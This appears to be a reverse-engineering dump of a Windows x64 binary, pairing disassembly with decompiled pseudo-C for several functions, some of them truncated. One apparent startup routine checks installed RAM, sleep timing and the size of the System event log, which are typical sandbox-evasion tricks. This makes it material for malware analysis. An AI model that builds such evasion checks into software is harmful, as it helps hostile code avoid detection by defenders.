if (uVar10 < 0x80000000) {
uVar14 = uVar10 * 2;
}
*(&stack0xffffffffffffffe0 + iVar9) = 0;
*(&uStack_48 + iVar9) = 1;
uVar17 = *(&uStack_48 + iVar9);
*(&uStack_48 + iVar9) = 0x1400177cd;
iVar7 = jmp_ntdll.NtQueryObject(param_2, uVar17, puVar12, uVar14);
uVar21 = 0xf;
if ((iVar7 == -0x7ffffffb) || (iVar7 == -0x3ffffffc)) {
code_r0x000140017870:
piVar19 = 0x140055798;
code_r0x000140017892:
uVar6 = *(piVar19 + 2);
if (uVar6 == 0x54) {
uVar21 = 5;
goto code_r0x0001400179d7;
}
if (uVar6 == 0) {
*(&stack0x00050698 + iVar9) = piVar19[1];
goto code_r0x0001400178b7;
}
goto code_r0x000140017ce2;
}
if (iVar7 == -0x3ffffff8) {
piVar19 = 0x1400557e0;
goto code_r0x000140017892;
}
if (iVar7 == -0x3fffffde) {
piVar19 = 0x1400557c8;
goto code_r0x000140017892;
}
if (iVar7 == -0x3fffffdd) goto code_r0x000140017870;
if (iVar7 != 0) goto code_r0x0001400179d7;
if (puVar12[1] == 0) {
piVar19 = 0x1400557b0;
goto code_r0x000140017892;
}
*(&stack0x00050698 + iVar9) = *puVar12 >> 1;
piVar19 = puVar12 + 4;
code_r0x0001400178b7:
iVar18 = *piVar19;
*(&uStack_48 + iVar9) = 0x10;
uVar17 = *(&uStack_48 + iVar9);
*(&uStack_48 + iVar9) = 0x1400178d0;
uVar10 = sub_140018134(0x140055868, uVar17, iVar18, uVar17);
if ((uVar10 & 1) == 0) goto code_r0x0001400179d7;
*(&stack0xffffffffffffffe0 + iVar9) = 0x1400555c8;
*(&stack0xffffffffffffffe8 + iVar9) = 1;
*(&uStack_48 + iVar9) = 8;
uVar17 = *(&uStack_48 + iVar9);
iVar20 = *(&stack0x00050698 + iVar9);
*(&uStack_48 + iVar9) = 0x14001790d;
sub_14001e6bb(&stack0x00050630 + iVar9, iVar18, iVar20, uVar17);
/* listing truncated */0x1400218CF sub_1400218cf str 3 api 3 imm 10 Unknown
sub_1400218cf() {
push rbp
push r15
push r14
push r12
push rsi
push rdi
push rbx
sub rsp, 0x50
lea rbp, [rsp+0x50]
mov rdi, r8
mov rbx, rdx
mov rsi, rcx
movsxd r15, dword ptr [0x14005D250]
test r15, r15
jle .3
mov rax, [0x14005D248]
lea rcx, [r15*8]
lea rcx, [rcx+rcx*4]
xor edx, edx
.1:
mov r8, [rax+rdx*1+0x18]
cmp r8, rsi
jnbe .2
mov r9, [rax+rdx*1+0x20]
mov r9d, [r9+0x08]
add r8, r9
cmp r8, rsi
jnbe .9
.2:
add rdx, 0x28
cmp rcx, rdx
jnz .1
jmp .4
.3:
xor r15d, r15d
.4:
mov rcx, rsi
call sub_1400226f0()
test rax, rax
jz .10
mov r14, rax
mov rax, [0x14005D248]
lea rcx, [r15*8]
lea r12, [rcx+rcx*4]
mov [rax+r12*1+0x20], r14
mov dword ptr [rax+r12*1], 0x00
call sub_1400227dc()
mov ecx, [r14+0x0C]
add rcx, rax
mov rax, [0x14005D248]
mov [rax+r12*1+0x18], rcx
lea rdx, [rbp-0x30]
mov r8d, 0x30
call [kernel32.VirtualQuery]
test rax, rax
jz .11
mov eax, [rbp-0x0C]
cmp eax, 0x07
jle .5
cmp eax, 0x08
jz .8
cmp eax, 0x40
jz .8
cmp eax, 0x80
jz .8
jmp .6
.5:
mov r8d, 0x04
cmp eax, 0x02
jz .7
cmp eax, 0x04
jz .8
.6:
mov r8d, 0x40
.7:
mov rcx, [rbp-0x30]
mov rax, [0x14005D248]
lea rdx, [r15+r15*4]
lea r9, [rax+rdx*8]
mov [r9+0x08], rcx
mov rdx, [rbp-0x18]
mov [r9+0x10], rdx
call [kernel32.VirtualProtect]
test eax, eax
jz .12
.8:
inc dword ptr [0x14005D250]
.9:
mov rcx, rsi
mov rdx, rbx
mov r8, rdi
call sub_140021d71()
nop
add rsp, 0x50
pop rbx
pop rdi
pop rsi
pop r12
pop r14
pop r15
pop rbp
ret
.10:
lea rcx, ["Address %p has no image-section"]
mov rdx, rsi
call sub_140021a60()
.11:
mov edx, [r14+0x08]
mov rax, [0x14005D248]
lea rcx, [r15+r15*4]
mov r8, [rax+rcx*8+0x18]
lea rcx, [" VirtualQuery failed for %d bytes at address %p"]
call sub_140021a60()
.12:
call [kernel32.GetLastError]
lea rcx, [" VirtualProtect failed with code 0x%x"]
mov edx, eax
call sub_140021a60()
}
/* DISPLAY WARNING: Type casts are NOT being printed */
void sub_1400218cf(uint64_t param_1,undefined8 param_2,undefined8 param_3)
{
uint64_t uVar1;
code *pcVar2;
int64_t iVar3;
int32_t iVar4;
undefined4 uVar5;
int64_t iVar6;
int64_t iVar7;
undefined8 uVar8;
int64_t unaff_R14;
int64_t iVar9;
undefined8 auStack_68 [3];
undefined8 uStack_50;
int32_t iStack_44;
iVar9 = [0x0x14005d250];
if (iVar9 < 1) {
iVar9 = 0;
}
else {
iVar7 = 0;
do {
uVar1 = *([0x0x14005d248] + 0x18 + iVar7);
if ((uVar1 <= param_1) && (param_1 < uVar1 + *(*([0x0x14005d248] + 0x20 + iVar7) + 8)))
goto code_r0x0001400219fe;
iVar7 = iVar7 + 0x28;
} while (iVar9 * 0x28 != iVar7);
}
iVar6 = sub_1400226f0(param_1);
iVar7 = [0x0x14005d248];
if (iVar6 == 0) {
sub_140021a60("Address %p has no image-section", param_1);
}
else {
iVar3 = iVar9 * 0x28;
*([0x0x14005d248] + 0x20 + iVar3) = iVar6;
*(iVar7 + iVar3) = 0;
iVar7 = sub_1400227dc();
iVar7 = *(iVar6 + 0xc) + iVar7;
*([0x0x14005d248] + 0x18 + iVar3) = iVar7;
iVar7 = (*kernel32.VirtualQuery)(iVar7, auStack_68, 0x30);
unaff_R14 = iVar6;
if (iVar7 != 0) {
if (iStack_44 < 8) {
uVar8 = 4;
if (iStack_44 != 2) {
if (iStack_44 == 4) goto code_r0x0001400219f8;
goto code_r0x0001400219c9;
}
}
else {
if (((iStack_44 == 8) || (iStack_44 == 0x40)) || (iStack_44 == 0x80)) goto code_r0x0001400219f8;
code_r0x0001400219c9:
uVar8 = 0x40;
}
iVar9 = [0x0x14005d248] + iVar9 * 0x28;
*(iVar9 + 8) = auStack_68[0];
*(iVar9 + 0x10) = uStack_50;
iVar4 = (*kernel32.VirtualProtect)(auStack_68[0], uStack_50, uVar8);
if (iVar4 != 0) {
code_r0x0001400219f8:
[0x0x14005d250] = [0x0x14005d250] + 1;
code_r0x0001400219fe:
sub_140021d71(param_1, param_2, param_3);
return;
}
goto code_r0x000140021a4b;
}
}
sub_140021a60(" VirtualQuery failed for %d bytes at address %p", *(unaff_R14 + 8), *([0x0x14005d248] + 0x18 + iVar9 * 0x28));
code_r0x000140021a4b:
uVar5 = (*kernel32.GetLastError)();
sub_140021a60(" VirtualProtect failed with code 0x%x", uVar5);
pcVar2 = swi(3);
(*pcVar2)();
return;
}
0x140014363 sub_140014363 str 3 api 0 imm 35 Unknown
sub_140014363() {
push rbp
push r15
push r14
push r13
push r12
push rsi
push rdi
push rbx
mov eax, 0x1448
call sub_140021d41()
sub rsp, rax
lea rbp, [rsp+0x80]
movaps [rbp+0x13B0], xmm6
mov rsi, r8
mov rdi, rdx
mov ebx, ecx
push 0xFFFFFFFFFFFFFFFF
pop r14
call loc_14002137f
.1:
cmp qword ptr [rsi+r14*8+0x08], 0x00
lea r14, [r14+0x01]
jnz .1
movsxd rax, ebx
mov [0x14005C160], rdi
mov [0x14005C168], rax
mov [0x14005C170], rsi
mov [0x14005C178], r14
mov ecx, 0xFDE9
call jmp_kernel32.SetConsoleOutputCP()
lea rdx, [0x140024AB8]
lea rsi, [rbp+0xFC8]
mov rcx, rsi
call sub_14000e20b()
mov rcx, [rsi]
mov rax, [rsi+0x08]
mov r14, [rbp+0x1408]
push 0x60
pop rdx
mov r8b, 0x03
mov r9, r14
call [rax]
test rax, rax
jz .2
mov rbx, rax
lea rsi, [0x140024AB8]
push 0x0B
pop rcx
mov rdi, rax
rep movsq
and qword ptr [rax+0x58], 0x00
lea rsi, [rbp+0x1280]
mov rcx, rsi
mov rdx, rax
call sub_14000e279()
mov rcx, [rsi]
mov rax, [rsi+0x08]
push 0x20
pop rdx
mov r8b, 0x03
mov r9, r14
call [rax]
test rax, rax
jz .3
mov rsi, rax
mov al, [0x140024DF8]
movups xmm0, [rbp+0x1280]
movups [rsi], xmm0
xor ecx, ecx
mov [rbp-0x50], cl
mov [rsi+0x18], cl
lea rcx, [sub_140013d2c()]
mov [rsi+0x10], rcx
and al, 0x01
mov [rsi+0x19], al
mov [0x14005C0F8], rsi
lea rcx, [sub_14000e03c()]
push 0x01
pop rdx
call jmp_kernel32.SetConsoleCtrlHandler()
push 0x02
pop r15
test eax, eax
jz .4
mov [rbx+0x58], rsi
mov rax, gs:[0x30]
mov rax, [rax+0x60]
mov rax, [rax+0x20]
mov rax, [rax+0x28]
lea rdx, [rbp+0x1178]
mov [rdx], rax
lea rcx, [rbp+0x1070]
call sub_14000e0ad()
mov rax, gs:[0x30]
mov rax, [rax+0x60]
mov rax, [rax+0x20]
mov rax, [rax+0x30]
lea rdx, [rbp+0x1038]
mov [rdx], rax
lea rsi, [rbp-0x50]
mov rcx, rsi
call sub_14000e0ad()
cmp byte ptr [rsi+0x10], 0x02
jnz .8
movups xmm0, [rbp-0x50]
movups [0x14005C100], xmm0
mov byte ptr [0x14005C110], 0x02
jmp .9
.2:
push 0x01
pop r15
jmp .6
.3:
push 0x01
pop r15
jmp .5
.4:
mov rcx, rsi
call sub_14000e078()
.5:
lea rcx, [0x140024AB8]
call sub_14000e2a5()
.6:
shl r15d, 0x04
lea rax, [0x140056570]
mov rsi, [r15+rax*1]
mov rdi, [r15+rax*1+0x08]
mov rax, gs:[0x30]
mov rax, [rax+0x60]
mov rax, [rax+0x20]
mov rax, [rax+0x30]
lea rbx, [rbp-0x50]
mov [rbx], rax
and qword ptr [rbx+0x08], 0x00
call sub_1400156a9()
lea rax, [rbp+0x1280]
mov [rax], rbx
lea rcx, [rbp+0x1070]
mov [rcx], rax
lea rax, [sub_14001e304()]
mov [rcx+0x08], rax
lea rdx, ["error: thread panic: \\"]
push 0x07
pop r8
call sub_140017f82()
test ax, ax
jnz .7
lea r8, [0x140055960]
lea r9, [rbp+0x1070]
mov rcx, rsi
mov rdx, rdi
call sub_14001c11f()
test ax, ax
jnz .7
lea rdx, [0x14002514A]
lea rcx, [rbp+0x1070]
push 0x01
pop r8
call sub_140017f82()
test ax, ax
jnz .7
lea rcx, [rbp-0x50]
call sub_14001c54d()
.7:
push 0x01
pop rsi
call sub_140015751()
jmp .22
.8:
mov rax, [0x140024E58]
mov [0x14005C110], rax
movups xmm0, [0x140024E48]
movups [0x14005C100], xmm0
.9:
lea rcx, [rbp+0x1390]
mov rdx, rbx
call sub_14000e279()
call sub_1400172a6()
call sub_140014287()
mov rsi, rax
call sub_1400172a6()
imul rcx, rsi, 0x3B9ACA00
call sub_1400142d4()
call sub_1400172a6()
xorps xmm0, xmm0
lea rsi, [rbp-0x50]
movaps [rsi], xmm0
movaps [rsi+0x30], xmm0
movaps [rsi+0x20], xmm0
movaps [rsi+0x10], xmm0
mov dword ptr [rsi], 0x40
mov rcx, rsi
call jmp_kernel32.GlobalMemoryStatusEx()
mov edi, eax
mov rsi, [rsi+0x08]
call sub_1400172a6()
test edi, edi
jz .10
shr rsi, 0x1E
cmp rsi, 0x03
jb .21
.10:
lea rsi, [rbp-0x50]
push 0x04
pop r8
mov rdx, rsi
call sub_1400151f6()
mov eax, [rsi]
imul r14, rax, 0x7D1
cmp r14d, 0x7D0
jnbe .12
push 0x04
pop rdi
.11:
cmp r14d, 0x375
jnbe .12
mov rdx, rsi
mov r8, rdi
call sub_1400151f6()
; listing truncated
/* WARNING: Removing unreachable block (ram,0x000140014c4b) */
/* DISPLAY WARNING: Type casts are NOT being printed */
uint64_t sub_140014363(int32_t param_1,undefined8 param_2,int64_t param_3)
{
undefined (*pauVar1) [16];
uint32_t *puVar2;
uint8_t uVar3;
uint16_t uVar4;
code *pcVar5;
undefined8 uVar6;
undefined8 uVar7;
undefined auVar8 [16];
undefined4 uVar9;
undefined4 uVar10;
int16_t iVar11;
int16_t iVar12;
int32_t iVar13;
uint32_t uVar14;
uint32_t uVar15;
int64_t iVar16;
undefined8 *puVar17;
undefined4 *puVar18;
int64_t iVar19;
uint64_t uVar20;
undefined8 uVar21;
undefined8 uVar22;
undefined8 *puVar23;
undefined8 *puVar24;
undefined8 uVar25;
undefined2 uVar26;
undefined *puVar27;
undefined *puVar28;
int64_t iVar29;
undefined2 *puVar30;
int16_t *piVar31;
int64_t unaff_GS_OFFSET;
bool bVar32;
undefined4 uVar33;
undefined4 unaff_XMM6_Da;
undefined4 unaff_XMM6_Db;
undefined4 unaff_XMM6_Dc;
undefined4 unaff_XMM6_Dd;
undefined auStackX_8 [8];
undefined auStackX_10 [8];
uint64_t uStackX_18;
undefined4 auStackX_20 [2];
uint64_t uStack_48;
uStack_48 = 0x140014379;
iVar16 = sub_140021d41();
iVar16 = -iVar16;
auVar8._4_4_ = unaff_XMM6_Db;
auVar8._0_4_ = unaff_XMM6_Da;
auVar8._8_4_ = unaff_XMM6_Dc;
auVar8._12_4_ = unaff_XMM6_Dd;
*(&stack0x000013f0 + iVar16) = auVar8;
*(&uStack_48 + iVar16) = 0xffffffffffffffff;
iVar29 = *(&uStack_48 + iVar16);
*(&uStack_48 + iVar16) = 0x14001439c;
func_0x00014002137f();
do {
iVar19 = iVar29 * 8;
iVar29 = iVar29 + 1;
} while (*(param_3 + 8 + iVar19) != 0);
000000014005c168 = param_1;
*(&uStack_48 + iVar16) = 0x1400143d1;
000000014005c160 = param_2;
000000014005c170 = param_3;
000000014005c178 = iVar29;
jmp_kernel32.SetConsoleOutputCP(0xfde9);
*(&uStack_48 + iVar16) = 0x1400143e7;
sub_14000e20b(&stack0x00001008 + iVar16, 0x140024ab8);
uVar22 = *(&stack0x00001448 + iVar16);
*(&uStack_48 + iVar16) = 0x60;
uVar21 = *(&uStack_48 + iVar16);
pcVar5 = **(&stack0x00001010 + iVar16);
*(&uStack_48 + iVar16) = 0x140014400;
puVar17 = (*pcVar5)(*(&stack0x00001008 + iVar16), uVar21, 3, uVar22);
if (puVar17 == 0x0) {
*(&uStack_48 + iVar16) = 1;
iVar13 = *(&uStack_48 + iVar16);
}
else {
*(&uStack_48 + iVar16) = 0xb;
puVar23 = 0x140024ab8;
puVar24 = puVar17;
for (iVar29 = *(&uStack_48 + iVar16); iVar29 != 0; iVar29 = iVar29 + -1) {
*puVar24 = *puVar23;
puVar23 = puVar23 + 1;
puVar24 = puVar24 + 1;
}
puVar17[0xb] = 0;
*(&uStack_48 + iVar16) = 0x140014433;
sub_14000e279(&stack0x000012c0 + iVar16, puVar17);
*(&uStack_48 + iVar16) = 0x20;
uVar21 = *(&uStack_48 + iVar16);
pcVar5 = **(&stack0x000012c8 + iVar16);
*(&uStack_48 + iVar16) = 0x140014445;
puVar18 = (*pcVar5)(*(&stack0x000012c0 + iVar16), uVar21, 3, uVar22);
uVar3 = [0x0x140024df8];
if (puVar18 == 0x0) {
*(&uStack_48 + iVar16) = 1;
uVar22 = *(&uStack_48 + iVar16);
}
else {
uVar33 = *(&stack0x000012c4 + iVar16);
uVar9 = *(&stack0x000012c8 + iVar16);
uVar10 = *(&stack0x000012cc + iVar16);
*puVar18 = *(&stack0x000012c0 + iVar16);
puVar18[1] = uVar33;
puVar18[2] = uVar9;
puVar18[3] = uVar10;
(&stack0xfffffffffffffff0)[iVar16] = 0;
*(puVar18 + 6) = 0;
*(puVar18 + 4) = sub_140013d2c;
*(puVar18 + 0x19) = uVar3 & 1;
*(&uStack_48 + iVar16) = 1;
uVar22 = *(&uStack_48 + iVar16);
*(&uStack_48 + iVar16) = 0x14001448f;
puRam000000014005c0f8 = puVar18;
iVar13 = jmp_kernel32.SetConsoleCtrlHandler(sub_14000e03c, uVar22);
*(&uStack_48 + iVar16) = 2;
uVar22 = *(&uStack_48 + iVar16);
if (iVar13 != 0) {
puVar17[0xb] = puVar18;
*(&stack0x000011b8 + iVar16) = *(*(*(*(unaff_GS_OFFSET + 0x30) + 0x60) + 0x20) + 0x28);
*(&uStack_48 + iVar16) = 0x1400144ca;
sub_14000e0ad(&stack0x000010b0 + iVar16);
*(&stack0x00001078 + iVar16) = *(*(*(*(unaff_GS_OFFSET + 0x30) + 0x60) + 0x20) + 0x30);
*(&uStack_48 + iVar16) = 0x1400144f5;
sub_14000e0ad(&stack0xfffffffffffffff0 + iVar16);
if (*(auStackX_20 + iVar16 + -0x20) == '\x02') {
000000014005c100 = *(&stack0xfffffffffffffff0 + iVar16);
000000014005c104 = *(&stack0xfffffffffffffff4 + iVar16);
000000014005c108 = *(&stack0xfffffffffffffff8 + iVar16);
000000014005c10c = *(&stack0xfffffffffffffffc + iVar16);
[0x0x14005c110] = CONCAT71([0x0x14005c111]._1_7_, 2);
}
else {
[0x0x14005c110] = [0x0x140024e58];
[0x0x14005c100] = [0x0x140024e48];
[0x0x14005c104] = [0x0x140024e4c];
[0x0x14005c108] = [0x0x140024e50];
[0x0x14005c10c] = [0x0x140024e54];
}
*(&uStack_48 + iVar16) = 0x14001461f;
sub_14000e279(&stack0x000013d0 + iVar16, puVar17);
*(&uStack_48 + iVar16) = 0x140014624;
sub_1400172a6();
*(&uStack_48 + iVar16) = 0x140014629;
iVar29 = sub_140014287();
*(&uStack_48 + iVar16) = 0x140014631;
sub_1400172a6();
*(&uStack_48 + iVar16) = 0x14001463d;
sub_1400142d4(iVar29 * 1000000000);
*(&uStack_48 + iVar16) = 0x140014642;
sub_1400172a6();
pauVar1 = &stack0xfffffffffffffff0 + iVar16;
*pauVar1 = ZEXT816(0);
*(auStackX_20 + iVar16) = ZEXT816(0);
*(auStackX_10 + iVar16) = ZEXT816(0);
*(auStackX_20 + iVar16 + -0x20) = ZEXT816(0);
**pauVar1 = 0x40;
*(&uStack_48 + iVar16) = 0x140014666;
iVar13 = jmp_kernel32.GlobalMemoryStatusEx(pauVar1);
uVar20 = *(&stack0xfffffffffffffff8 + iVar16);
*(&uStack_48 + iVar16) = 0x140014671;
uVar33 = sub_1400172a6();
if ((iVar13 == 0) || (2 < uVar20 >> 0x1e)) {
puVar2 = &stack0xfffffffffffffff0 + iVar16;
*(&uStack_48 + iVar16) = 4;
uVar21 = *(&uStack_48 + iVar16);
*(&uStack_48 + iVar16) = 0x140014693;
uVar33 = sub_1400151f6(uVar33, puVar2, uVar21);
iVar29 = *puVar2 * 0x7d1;
if (iVar29 < 0x7d1) {
*(&uStack_48 + iVar16) = 4;
uVar21 = *(&uStack_48 + iVar16);
while (iVar29 < 0x376) {
*(&uStack_48 + iVar16) = 0x1400146bc;
uVar33 = sub_1400151f6(uVar33, puVar2, uVar21);
iVar29 = *(&stack0xfffffffffffffff0 + iVar16) * 0x7d1;
}
}
iVar13 = iVar29 >> 0x20;
*(&uStack_48 + iVar16) = 0x1400146de;
iVar29 = sub_140017348();
*(&uStack_48 + iVar16) = 0x1400146e9;
sub_1400142d4((iVar13 + 1000) * 1000000);
*(&uStack_48 + iVar16) = 0x1400146ee;
iVar19 = sub_140017348();
uVar14 = iVar13 * 8 + 8000;
*(&uStack_48 + iVar16) = 0x14001470d;
sub_1400172a6(10, uVar14 % 10);
if (uVar14 / 10 <= iVar19 - iVar29) {
*(&uStack_48 + iVar16) = 0x140014724;
iVar29 = jmp_advapi32.OpenEventLogW(0, "System");
if (iVar29 == 0) {
*(&uStack_48 + iVar16) = 0x140014761;
sub_1400172a6();
}
else {
*(&stack0xfffffffffffffff0 + iVar16) = 0;
*(&uStack_48 + iVar16) = 0x14001473b;
iVar13 = jmp_advapi32.GetNumberOfEventLogRecords(iVar29);
if (iVar13 == 0) {
*(&uStack_48 + iVar16) = 0x140014768;
sub_1400172a6();
*(&uStack_48 + iVar16) = 0x140014770;
jmp_advapi32.CloseEventLog(iVar29);
}
else {
uVar14 = *(&stack0xfffffffffffffff0 + iVar16);
*(&uStack_48 + iVar16) = 0x140014747;
sub_1400172a6();
*(&uStack_48 + iVar16) = 0x14001474f;
/* listing truncated */0x14001EBE3 sub_14001ebe3 str 3 api 0 imm 34 Unknown
sub_14001ebe3() {
mov r8, r14
mov r10, rax
jmp .1
.1:
mov r14, r8
sub r14, r10
jl .2
inc r15b
movzx r15d, r15b
lea r8d, [r15-0x01]
movsxd r11, dword ptr [rdx+r8*4]
add r11, rdx
mov r8, r14
mov r10, rcx
jmp r11
.2:
mov r14, r8
lea rax, [r9+0x15180]
test r9, r9
cmovns rax, r9
mov ecx, 0xE10
cqo
idiv rcx
mov rcx, rax
inc r14b
mov r9, 0x8000000000000000
xor r10d, r10d
cmp rdx, r9
setnbe r10b
mov eax, 0xE10
cmovbe eax, r9d
add eax, edx
mov r8w, 0x3C
cwd
idiv r8w
mov r8d, eax
sub rcx, r10
movsx eax, dx
mov r10d, eax
shr r10d, 0x0F
add r8d, r10d
mov r11b, 0x3C
and r10b, r11b
add r10b, al
push 0x18
pop rsi
mov rax, rcx
cqo
idiv rsi
cmp rdx, r9
push 0x18
pop rax
cmovbe eax, r9d
add edx, eax
mov [rbp-0x08], rdx
movsx eax, r8b
idiv r11b
movsx eax, ah
mov ecx, eax
sar cl, 0x07
and cl, 0x3C
add cl, al
mov [rbp+0x0E], cl
movsx eax, r10b
idiv r11b
movsx eax, ah
mov ecx, eax
sar cl, 0x07
and cl, 0x3C
add cl, al
mov [rbp+0x0F], cl
lea r12, ["%H:%M:%S "]
mov r9b, 0x0A
xor r13d, r13d
xor esi, esi
mov rdx, [rbp]
.3:
cmp rsi, 0x08
jnbe .19
mov al, [rsi+r12*1]
cmp al, 0x25
jnz .5
cmp rsi, 0x08
jz .21
inc rsi
movzx eax, byte ptr [rsi+r12*1]
cmp eax, 0x25
jz .10
cmp eax, 0x48
jz .13
cmp eax, 0x4D
jz .12
cmp eax, 0x53
jz .7
cmp eax, 0x7A
jz .9
cmp eax, 0x64
jz .8
cmp eax, 0x6D
jz .11
cmp eax, 0x59
jnz .21
cmp r13, 0x0E
jnbe .20
lea rax, [rdx+r13*1]
push 0x12
pop rcx
sub rcx, r13
mov [rbp-0x30], rax
mov [rbp-0x28], rcx
and qword ptr [rbp-0x20], 0x00
lea rax, [rbp-0x30]
mov [rbp-0x18], rax
push 0x20
pop r8
mov ecx, ebx
.4:
cmp ecx, 0x64
jb .16
mov eax, ecx
xor edx, edx
div edi
movzx edx, dl
mov ecx, eax
mov eax, edx
div r9b
movzx edx, ah
or dl, 0x30
movzx edx, dl
shl edx, 0x08
movzx eax, al
add eax, edx
add eax, 0x30
mov [rbp+r8*1-0x52], ax
add r8, 0xFFFFFFFFFFFFFFFE
jmp .4
.5:
cmp r13, 0x11
jnbe .20
mov [rdx+r13*1], al
.6:
inc r13
jmp .15
.7:
cmp r13, 0x10
jnbe .20
lea r12, [r13+0x02]
lea rcx, [rdx+r13*1]
push 0x12
pop rdx
sub rdx, r13
mov r8b, [rbp+0x0F]
jmp .14
.8:
cmp r13, 0x10
jnbe .20
lea r12, [r13+0x02]
lea rcx, [rdx+r13*1]
push 0x12
pop rdx
sub rdx, r13
mov r8d, r14d
jmp .14
.9:
cmp r13, 0x0C
jnbe .20
lea r12, [rdx+r13*1]
inc r12
mov byte ptr [r12-0x01], 0x2B
push 0x11
pop rdx
sub rdx, r13
mov rcx, r12
xor r8d, r8d
call sub_14001ea41()
mov r9b, 0x0A
mov rdx, [rbp]
mov word ptr [r12+0x02], 0x303A
mov byte ptr [r12+0x04], 0x30
lea r12, ["%H:%M:%S "]
add r13, 0x06
jmp .15
.10:
cmp r13, 0x11
jnbe .20
mov byte ptr [rdx+r13*1], 0x25
jmp .6
.11:
cmp r13, 0x10
jnbe .20
lea r12, [r13+0x02]
lea rcx, [rdx+r13*1]
push 0x12
pop rdx
sub rdx, r13
mov r8d, r15d
jmp .14
.12:
cmp r13, 0x10
jnbe .20
lea r12, [r13+0x02]
lea rcx, [rdx+r13*1]
push 0x12
pop rdx
sub rdx, r13
mov r8b, [rbp+0x0E]
jmp .14
.13:
cmp r13, 0x10
jnbe .20
lea r12, [r13+0x02]
lea rcx, [rdx+r13*1]
push 0x12
pop rdx
sub rdx, r13
mov r8, [rbp-0x08]
.14:
call sub_14001ea41()
mov r9b, 0x0A
; listing truncated
/* DISPLAY WARNING: Type casts are NOT being printed */
void sub_14001ebe3(undefined8 param_1,int64_t param_2,undefined8 param_3,int64_t param_4)
{
int64_t *piVar1;
uint8_t uVar2;
char cVar7;
uint16_t uVar3;
int32_t iVar4;
uint32_t uVar5;
int32_t iVar6;
int64_t in_RAX;
undefined2 uVar8;
undefined *puVar9;
uint64_t uVar10;
int64_t iVar11;
uint32_t unaff_EBX;
int64_t *unaff_RBP;
uint64_t uVar12;
uint64_t uVar13;
uint64_t unaff_RDI;
int64_t iVar14;
uint64_t uVar15;
int64_t unaff_R14;
uint64_t unaff_R15;
if (in_RAX <= unaff_R14) {
/* WARNING: Could not recover jumptable at 0x00014001ec12. Too many branches */
/* WARNING: Treating indirect jump as call */
(*(*(param_2 + ((unaff_R15 + 1) - 1) * 4) + param_2))(param_1, param_2, unaff_R14 - in_RAX);
return;
}
iVar14 = param_4 + 0x15180;
if (-1 < param_4) {
iVar14 = param_4;
}
uVar10 = iVar14 % 0xe10;
iVar4 = 0xe10;
if (uVar10 < 0x8000000000000001) {
iVar4 = 0;
}
uVar5 = iVar4 + uVar10;
uVar5 = (uVar5 >> 0xf) << 0x10 | uVar5 & 0xffff;
iVar4 = uVar5 % 0x3c;
uVar2 = iVar4 >> 0xf;
uVar10 = (iVar14 / 0xe10 - (0x8000000000000000 < uVar10)) % 0x18;
iVar6 = 0x18;
if (uVar10 < 0x8000000000000001) {
iVar6 = 0;
}
unaff_RBP[-1] = uVar10 + iVar6;
cVar7 = (uVar5 / 0x3c + uVar2) % '<';
*(unaff_RBP + 0xe) = (cVar7 >> 7 & 0x3cU) + cVar7;
cVar7 = ((uVar2 & 0x3c) + iVar4) % '<';
*(unaff_RBP + 0xf) = (cVar7 >> 7 & 0x3cU) + cVar7;
uVar13 = 0;
iVar14 = *unaff_RBP;
uVar10 = 0;
do {
if (8 < uVar13) {
uVar8 = 0;
code_r0x00014001ef60:
piVar1 = unaff_RBP[-2];
*piVar1 = iVar14;
piVar1[1] = uVar10;
*(piVar1 + 2) = uVar8;
*(piVar1 + 0x12) = *(unaff_RBP + 2);
*(piVar1 + 0x16) = *(unaff_RBP + 0x14);
return;
}
if (*(uVar13 + "%H:%M:%S ") == '%') {
if (uVar13 == 8) {
code_r0x00014001ef53:
*(unaff_RBP + 0x14) = 0;
*(unaff_RBP + 2) = 0;
uVar8 = 0x67;
}
else {
uVar12 = uVar13 + 1;
cVar7 = *(uVar13 + 0x1400556a8);
uVar13 = uVar12;
if (cVar7 == '%') {
if (uVar10 < 0x12) {
*(iVar14 + uVar10) = 0x25;
goto code_r0x00014001edbe;
}
}
else if (cVar7 == 'H') {
if (uVar10 < 0x11) {
iVar11 = 0x12 - uVar10;
uVar15 = unaff_RBP[-1];
code_r0x00014001eebf:
uVar12 = uVar10 + 2;
sub_14001ea41(iVar14 + uVar10, iVar11, uVar15);
iVar14 = *unaff_RBP;
goto code_r0x00014001eed5;
}
}
else if (cVar7 == 'M') {
if (uVar10 < 0x11) {
iVar11 = 0x12 - uVar10;
uVar15 = *(unaff_RBP + 0xe);
goto code_r0x00014001eebf;
}
}
else if (cVar7 == 'S') {
if (uVar10 < 0x11) {
iVar11 = 0x12 - uVar10;
uVar15 = *(unaff_RBP + 0xf);
goto code_r0x00014001eebf;
}
}
else if (cVar7 == 'z') {
if (uVar10 < 0xd) {
puVar9 = iVar14 + uVar10;
*puVar9 = 0x2b;
sub_14001ea41(puVar9 + 1, 0x11 - uVar10, 0);
iVar14 = *unaff_RBP;
*(puVar9 + 3) = 0x303a;
puVar9[5] = 0x30;
uVar12 = uVar10 + 6;
goto code_r0x00014001eed5;
}
}
else if (cVar7 == 'd') {
if (uVar10 < 0x11) {
iVar11 = 0x12 - uVar10;
uVar15 = unaff_R14 + 1;
goto code_r0x00014001eebf;
}
}
else if (cVar7 == 'm') {
if (uVar10 < 0x11) {
iVar11 = 0x12 - uVar10;
uVar15 = unaff_R15 & 0xffffffff;
goto code_r0x00014001eebf;
}
}
else {
if (cVar7 != 'Y') goto code_r0x00014001ef53;
if (uVar10 < 0xf) {
unaff_RBP[-6] = iVar14 + uVar10;
unaff_RBP[-5] = 0x12 - uVar10;
unaff_RBP[-4] = 0;
unaff_RBP[-3] = unaff_RBP + -6;
iVar14 = 0x20;
for (uVar5 = unaff_EBX; 99 < uVar5; uVar5 = uVar5 / (unaff_RDI & 0xffffffff)) {
uVar3 = uVar5 % (unaff_RDI & 0xffffffff) & 0xff;
*(unaff_RBP + iVar14 + -0x52) = uVar3 / 10 + (uVar3 % 10 | 0x30) * 0x100 + 0x30;
iVar14 = iVar14 + -2;
}
if (uVar5 < 10) {
*(unaff_RBP + iVar14 + -0x51) = uVar5 | 0x30;
}
else {
uVar3 = uVar5 & 0xff;
*(unaff_RBP + iVar14 + -0x52) = uVar3 / 10 + (uVar3 % 10 | 0x30) * 0x100 + 0x30;
iVar14 = iVar14 + -1;
}
uVar12 = uVar10 + 4;
puVar9 = unaff_RBP + iVar14 + -0x52;
*puVar9 = 0x2b;
sub_1400200aa(puVar9, 0x22 - iVar14, 0x140055648, unaff_RBP + -3);
iVar14 = *unaff_RBP;
goto code_r0x00014001eed5;
}
}
code_r0x00014001ef44:
*(unaff_RBP + 0x14) = 0;
